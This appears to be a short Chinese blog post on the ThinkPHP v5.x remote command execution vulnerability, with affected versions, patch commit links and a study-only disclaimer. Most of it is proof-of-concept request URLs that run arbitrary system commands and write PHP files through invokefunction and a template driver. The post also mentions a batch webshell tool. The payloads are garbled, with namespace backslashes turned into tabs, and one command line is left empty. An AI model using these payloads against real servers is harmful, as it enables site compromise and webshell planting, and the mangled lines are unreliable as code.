ThinkPHP v5.x命令执行漏洞

漏洞影响

版本: Thinkphp v5.1.29(影响版本<5.1.31和<5.0.23)

相关注明

漏洞分析仅用于学习!!!一切实际攻击利用行为概不负责。

漏洞修复

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

漏洞构造

5.0版本POC(不唯一)

命令执行:public/index.php?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
文件写入:public/index.php?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=mracat.php&vars[1][1]=<?php phpinfo();?>

5.1版本POC(不唯一)

命令执行:
文件写入:public/index.php?s=index/	hink	emplatedriverfile/write&cacheFile=mracat.php&content=<?php phpinfo();?>

批量GetShell工具

由于工具来自其他大佬,这里就不做发布

1.png

© 版权声明
THE END
喜欢就支持一下吧
点赞7
分享